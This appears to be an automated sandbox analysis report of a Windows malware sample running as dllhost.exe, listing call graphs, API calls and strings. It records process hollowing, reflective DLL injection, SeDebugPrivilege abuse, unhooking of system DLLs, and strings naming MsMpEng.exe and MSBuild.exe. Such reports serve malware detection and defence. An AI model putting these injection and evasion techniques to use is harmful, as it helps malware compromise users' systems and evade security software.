                                                                                                                                                          execution_graph 608 1400031c4 609 1400031d5 608->609 610 1400031fd 608->610 614 140001868 OpenProcess 609->614 613 140001868 31 API calls 613->610 615 140001cd1 614->615 616 1400018b0 IsWow64Process 614->616 615->613 617 1400018c7 CloseHandle 616->617 617->615 619 1400018ed 617->619 619->615 620 14000192f OpenProcess 619->620 620->615 621 14000194b OpenProcess 620->621 622 140001a04 NtQueryInformationProcess 621->622 623 14000196a K32GetModuleFileNameExW 621->623 626 140001cc8 CloseHandle 622->626 627 140001a29 622->627 624 1400019b3 CloseHandle 623->624 625 140001983 PathFindFileNameW lstrlenW 623->625 624->622 629 1400019c1 624->629 625->624 628 1400019a0 StrCpyW 625->628 626->615 627->626 630 140001a33 OpenProcessToken 627->630 628->624 629->622 631 1400019e0 StrCmpIW 629->631 630->626 632 140001a51 GetTokenInformation 630->632 631->626 631->629 633 140001af4 632->633 634 140001a79 GetLastError 632->634 635 140001afb CloseHandle 633->635 634->633 636 140001a84 LocalAlloc 634->636 635->626 641 140001b0f 635->641 636->633 637 140001a9a GetTokenInformation 636->637 638 140001ae2 637->638 639 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 637->639 640 140001ae9 LocalFree 638->640 639->640 640->635 641->626 642 140001b9f StrStrA 641->642 643 140001bc8 641->643 642->641 644 140001bcd 642->644 643->626 644->626 645 140001bf8 VirtualAllocEx 644->645 645->626 646 140001c27 WriteProcessMemory 645->646 646->626 647 140001c46 646->647 655 140002bfc 647->655 658 1400020cc GetModuleHandleA 655->658 659 1400020f5 658->659 660 1400020ec GetProcAddress 658->660 660->659 661 140003204 662 14000322b 661->662 663 14000341d 661->663 664 140003231 662->664 665 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 662->665 666 140003599 ReadFile 663->666 667 140003429 663->667 669 140003382 ExitProcess 664->669 670 14000323d 664->670 668 1400032c9 665->668 688 1400033c9 665->688 666->668 671 1400035c3 666->671 672 140003432 667->672 673 14000358f 667->673 675 140003246 670->675 676 1400032ea RegOpenKeyExW 670->676 671->668 677 1400035d0 GetProcessHeap HeapAlloc 671->677 678 140003534 672->678 679 14000343e 672->679 674 140001f7c 22 API calls 673->674 674->668 675->668 693 140003260 ReadFile 675->693 681 140003353 676->681 682 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 676->682 683 140001cf0 13 API calls 677->683 686 1400020fc ReadFile 678->686 684 140003443 679->684 685 140003480 679->685 680 140001868 31 API calls 680->688 721 14000217c SysAllocString SysAllocString CoInitializeEx 681->721 682->681 705 140003609 683->705 684->668 734 140002c5c 684->734 737 1400020fc 685->737 690 140003543 686->690 688->668 688->680 690->668 696 1400020fc ReadFile 690->696 692 14000335f 698 14000217c 9 API calls 692->698 693->668 699 14000328a 693->699 694 14000363e GetProcessHeap HeapFree 694->668 702 14000355a 696->702 697 140003497 ReadFile 697->668 703 1400034bf 697->703 704 14000336b 698->704 699->668 710 140001868 31 API calls 699->710 702->668 707 140003562 ShellExecuteW 702->707 703->668 708 1400034cc GetProcessHeap HeapAlloc ReadFile 703->708 729 140001f7c GetProcessHeap HeapAlloc 704->729 705->694 711 14000352f 705->711 769 140001eec 705->769 707->668 708->694 713 140003510 708->713 715 1400032b0 710->715 711->694 713->694 741 140002434 713->741 717 140001868 31 API calls 715->717 717->668 722 1400022d8 SysFreeString SysFreeString 721->722 723 1400021bd CoInitializeSecurity 721->723 722->692 724 140002205 CoCreateInstance 723->724 725 1400021f9 723->725 726 1400022d2 CoUninitialize 724->726 727 140002234 VariantInit 724->727 725->724 725->726 726->722 728 14000228a 727->728 728->726 730 140001cf0 13 API calls 729->730 732 140001fba 730->732 731 140001fe8 GetProcessHeap HeapFree 732->731 733 140001eec 5 API calls 732->733 733->732 735 1400020cc 2 API calls 734->735 736 140002c71 735->736 738 140002120 ReadFile 737->738 739 140002143 738->739 740 14000215d 738->740 739->738 739->740 740->668 740->697 742 14000246f 741->742 766 140002726 741->766 744 1400020cc 2 API calls 742->744 765 1400024ae 742->765 742->766 743 1400024d7 CreateProcessW 743->765 744->765 745 1400028e1 OpenProcess 746 1400028f1 TerminateProcess 745->746 745->765 746->765 747 1400020cc GetModuleHandleA GetProcAddress 747->765 748 140002566 VirtualAllocEx 750 140002595 WriteProcessMemory 748->750 748->765 749 14000273f VirtualAllocEx 751 14000276d WriteProcessMemory 749->751 749->765 752 1400025b7 VirtualProtectEx 750->752 750->765 753 14000278f VirtualProtectEx 751->753 751->765 752->765 753->765 754 140002858 VirtualAlloc 758 140002879 Wow64GetThreadContext 754->758 754->765 755 140002682 VirtualAlloc 757 1400026a7 GetThreadContext 755->757 755->765 756 1400027d0 WriteProcessMemory 756->765 760 1400026c4 WriteProcessMemory 757->760 757->765 761 140002891 WriteProcessMemory 758->761 758->765 759 1400025f9 WriteProcessMemory 759->765 762 1400026ef SetThreadContext 760->762 760->765 763 1400028b6 Wow64SetThreadContext 761->763 761->765 764 140002712 ResumeThread 762->764 762->765 763->765 764->765 764->766 765->743 765->745 765->747 765->748 765->749 765->754 765->755 765->756 765->759 765->766 767 140002643 VirtualProtectEx 765->767 768 14000281a VirtualProtectEx 765->768 766->711 767->765 768->765 770 140001f65 769->770 771 140001f0b OpenProcess 769->771 770->694 771->770 772 140001f23 771->772 773 140002bfc 2 API calls 772->773 774 140001f43 773->774 775 140001f5c CloseHandle 774->775 776 140001f51 CloseHandle 774->776 775->770 776->775 529 140002d38 532 140002d4c 529->532 533 140002d5e OpenMutexW 532->533 534 140002d84 CloseHandle 533->534 535 140002d77 Sleep 533->535 580 140002a0c 534->580 535->533 538 140002a0c 14 API calls 539 140002da5 GetCurrentProcessId OpenProcess 538->539 540 140002dc3 OpenProcessToken 539->540 541 140002e39 RegOpenKeyExW 539->541 544 140002dd9 LookupPrivilegeValueW 540->544 545 140002e30 CloseHandle 540->545 542 140002d41 ExitProcess 541->542 543 140002e6a RegQueryValueExW 541->543 543->542 546 140002e9a RegQueryValueExW 543->546 544->545 547 140002df0 AdjustTokenPrivileges 544->547 545->541 546->542 548 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 546->548 547->545 549 140002e2a GetLastError 547->549 548->542 550 140002f3c RegQueryValueExW 548->550 549->545 550->542 551 140002f6c RegCloseKey GetCurrentProcessId 550->551 594 14000200c GetProcessHeap HeapAlloc 551->594 581 140002a15 StrCpyW StrCatW GetModuleHandleW 580->581 582 140002bdf 580->582 581->582 583 140002a66 GetCurrentProcess K32GetModuleInformation 581->583 582->538 584 140002bd6 FreeLibrary 583->584 585 140002a96 CreateFileW 583->585 584->582 585->584 586 140002acb CreateFileMappingW 585->586 587 140002af4 MapViewOfFile 586->587 588 140002bcd CloseHandle 586->588 589 140002bc4 CloseHandle 587->589 590 140002b17 587->590 588->584 589->588 590->589 591 140002b30 lstrcmpiA 590->591 593 140002b6e 590->593 591->590 592 140002b70 VirtualProtect VirtualProtect 591->592 592->589 593->589 600 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 594->600 596 1400020a5 GetProcessHeap HeapFree 597 140002050 597->596 598 140002071 OpenProcess 597->598 598->597 599 140002087 TerminateProcess CloseHandle 598->599 599->597 601 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 600->601 602 140001d7d 600->602 601->597 602->601 603 140001d92 OpenProcess 602->603 605 140001e43 CloseHandle 602->605 606 140001de9 ReadProcessMemory 602->606 603->602 604 140001daf K32EnumProcessModulesEx 603->604 604->602 604->605 605->602 607 140001e0b 606->607 607->602 607->605 607->606 777 140003728 778 140003735 777->778 780 140003755 ConnectNamedPipe 778->780 781 14000374a Sleep 778->781 787 140002300 AllocateAndInitializeSid 778->787 782 1400037b3 Sleep 780->782 783 140003764 ReadFile 780->783 781->778 785 1400037be DisconnectNamedPipe 782->785 784 140003787 WriteFile 783->784 783->785 784->785 785->780 788 14000241b 787->788 789 14000235d SetEntriesInAclW 787->789 788->778 789->788 790 1400023a1 LocalAlloc 789->790 790->788 791 1400023b5 InitializeSecurityDescriptor 790->791 791->788 792 1400023c5 SetSecurityDescriptorDacl 791->792 792->788 793 1400023dc CreateNamedPipeW 792->793 793->788 794 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 795 1400036be K32EnumProcesses 794->795 796 1400036d3 795->796 797 14000371b Sleep 795->797 796->797 797->795 798 140002cb0 799 140002cbd 798->799 800 140002300 6 API calls 799->800 801 140002cd2 Sleep 799->801 802 140002cdd ConnectNamedPipe 799->802 800->799 801->799 803 140002d21 Sleep 802->803 804 140002cec ReadFile 802->804 805 140002d2c DisconnectNamedPipe 803->805 804->805 806 140002d0f 804->806 805->802 806->805

                                                                                                                                                          Callgraph

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269registrymemorythreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 14 140002e9a-140002ec4 RegQueryValueExW 11->14 12->13 15 140002df0-140002e28 AdjustTokenPrivileges 12->15 13->9 14->10 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->13 17 140002e2a GetLastError 15->17 16->10 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->13 18->10 19 140002f6c-140002f7e RegCloseKey GetCurrentProcessId call 14000200c 18->19 21 140002f83-140002fba RegCreateKeyExW 19->21 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 21->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 21->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree Sleep 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->10
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                                          • API String ID: 2725631067-1382791509
                                                                                                                                                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                                                                                                                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744
                                                                                                                                                          Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084875642-0
                                                                                                                                                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                                                                                                                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600
                                                                                                                                                          Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                                          • API String ID: 2721474350-832442975
                                                                                                                                                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                                                                                                                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704
                                                                                                                                                          Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704
                                                                                                                                                          Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 92 140002d38-140002d3c call 140002d4c 94 140002d41-140002d43 ExitProcess 92->94
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                                                                                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                                                                                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                                                                                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3805535264-0
                                                                                                                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                                                                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287memorystringnativeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 95 140001868-1400018aa OpenProcess 96 140001cd1-140001ced 95->96 97 1400018b0-1400018c5 IsWow64Process 95->97 98 1400018d5 97->98 99 1400018c7-1400018d3 97->99 100 1400018db-1400018e7 CloseHandle 98->100 99->100 100->96 101 1400018ed-1400018f8 100->101 101->96 102 1400018fe-140001913 101->102 103 140001925 102->103 104 140001915-14000191a 102->104 106 140001927-140001929 103->106 104->96 105 140001920-140001923 104->105 105->106 106->96 107 14000192f-140001945 OpenProcess 106->107 107->96 108 14000194b-140001964 OpenProcess 107->108 109 140001a04-140001a23 NtQueryInformationProcess 108->109 110 14000196a-140001981 K32GetModuleFileNameExW 108->110 113 140001cc8-140001ccb CloseHandle 109->113 114 140001a29-140001a2d 109->114 111 1400019b3-1400019bf CloseHandle 110->111 112 140001983-14000199e PathFindFileNameW lstrlenW 110->112 111->109 116 1400019c1-1400019db 111->116 112->111 115 1400019a0-1400019b0 StrCpyW 112->115 113->96 114->113 117 140001a33-140001a4b OpenProcessToken 114->117 115->111 118 1400019e0-1400019f2 StrCmpIW 116->118 117->113 119 140001a51-140001a77 GetTokenInformation 117->119 118->113 120 1400019f8-140001a02 118->120 121 140001af4 119->121 122 140001a79-140001a82 GetLastError 119->122 120->109 120->118 123 140001afb-140001b09 CloseHandle 121->123 122->121 124 140001a84-140001a98 LocalAlloc 122->124 123->113 125 140001b0f-140001b16 123->125 124->121 126 140001a9a-140001ac0 GetTokenInformation 124->126 125->113 127 140001b1c-140001b27 125->127 128 140001ae2 126->128 129 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 126->129 127->113 130 140001b2d-140001b37 127->130 131 140001ae9-140001af2 LocalFree 128->131 129->131 132 140001b52 130->132 133 140001b39-140001b43 130->133 131->123 135 140001b56-140001b8e call 1400029a4 * 3 132->135 133->113 134 140001b49-140001b50 133->134 134->135 135->113 142 140001b94-140001bb4 call 1400029a4 StrStrA 135->142 145 140001bb6-140001bc6 142->145 146 140001bcd-140001bf2 call 1400029a4 * 2 142->146 145->142 147 140001bc8 145->147 146->113 152 140001bf8-140001c21 VirtualAllocEx 146->152 147->113 152->113 153 140001c27-140001c40 WriteProcessMemory 152->153 153->113 154 140001c46-140001c68 call 140002bfc 153->154 154->113 157 140001c6a-140001c72 154->157 157->113 158 140001c74-140001c81 WaitForSingleObject 157->158 159 140001c83-140001c97 GetExitCodeThread 158->159 160 140001cbd-140001cc2 CloseHandle 158->160 161 140001ca2-140001cbb VirtualFreeEx 159->161 162 140001c99-140001c9f 159->162 160->113 161->160 162->161
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                                                                                                                          • API String ID: 2456419452-2628171563
                                                                                                                                                          • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                                                                                                                                          • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740
                                                                                                                                                          Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 214 140003204-140003225 215 14000322b 214->215 216 14000341d-140003423 214->216 217 140003231-140003237 215->217 218 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 215->218 219 140003599-1400035bd ReadFile 216->219 220 140003429-14000342c 216->220 223 140003382-140003384 ExitProcess 217->223 224 14000323d-140003240 217->224 221 140003652-140003664 218->221 222 1400033c9-1400033da 218->222 219->221 225 1400035c3-1400035ca 219->225 226 140003432-140003438 220->226 227 14000358f-140003594 call 140001f7c 220->227 222->221 228 1400033e0-140003416 call 140001868 * 2 222->228 230 140003246-140003249 224->230 231 1400032ea-140003315 RegOpenKeyExW 224->231 225->221 232 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 225->232 233 140003534-140003547 call 1400020fc 226->233 234 14000343e-140003441 226->234 227->221 271 140003418 228->271 239 1400032db-1400032e5 230->239 240 14000324f-140003252 230->240 236 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 231->236 237 140003317-14000334d RegDeleteValueW * 3 231->237 257 14000360d-140003613 232->257 258 14000363e-14000364c GetProcessHeap HeapFree 232->258 233->221 260 14000354d-14000355c call 1400020fc 233->260 242 140003443-140003449 234->242 243 140003480-140003491 call 1400020fc 234->243 236->221 237->236 239->221 248 140003254-14000325a 240->248 249 1400032ce-1400032d6 240->249 242->221 251 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 242->251 243->221 262 140003497-1400034b9 ReadFile 243->262 248->221 256 140003260-140003284 ReadFile 248->256 249->221 256->221 265 14000328a-140003291 256->265 257->258 266 140003615-140003627 257->266 258->221 260->221 277 140003562-14000358a ShellExecuteW 260->277 262->221 270 1400034bf-1400034c6 262->270 265->221 273 140003297-1400032c9 call 140001868 * 2 265->273 274 140003629-14000362b 266->274 275 14000362d-140003635 266->275 270->221 278 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 270->278 271->221 273->221 274->275 281 140003639 call 140001eec 274->281 275->266 282 140003637 275->282 277->221 278->258 284 140003510-14000351c 278->284 281->258 282->258 284->258 287 140003522-14000352f call 140002434 284->287 287->258
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
